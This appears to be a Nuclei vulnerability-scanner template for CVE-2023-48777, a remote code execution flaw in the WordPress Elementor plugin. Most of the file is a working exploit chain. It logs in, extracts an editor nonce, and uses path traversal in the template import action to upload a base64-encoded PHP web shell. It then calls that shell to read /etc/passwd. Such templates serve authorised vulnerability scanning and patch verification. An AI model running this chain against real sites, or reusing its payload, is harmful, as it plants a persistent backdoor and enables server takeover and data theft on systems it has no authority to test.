72 lines
2.6 KiB
YAML
72 lines
2.6 KiB
YAML
id: CVE-2023-48777
|
|
|
|
info:
|
|
name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
|
|
remediation: Fixed in 3.18.2
|
|
reference:
|
|
- https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
|
|
- https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 9.9
|
|
cve-id: CVE-2023-48777
|
|
cwe-id: CWE-434
|
|
epss-score: 0.00054
|
|
epss-percentile: 0.21518
|
|
cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:wordpress:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/elementor/"
|
|
product: website_builder
|
|
vendor: elementor
|
|
tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
|
|
variables:
|
|
filename: "{{rand_base(6)}}"
|
|
payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
|
|
|
|
- |
|
|
GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "regex('root:.*:0:0:', body_4)"
|
|
- "status_code_4 == 200"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
internal: true
|
|
name: nonce
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
|
|
# digest: 4a0a00473045022100b3d8b25c92e7ab54e8cb62b3d79e4e6e3092cf2c52826a69391556080b19e1ed02205892c3846769266322a0c3fc634235e3a99ce58f003c1cf559ca26a336c7dc55:922c64590222798bb761d5b6d8e72950 |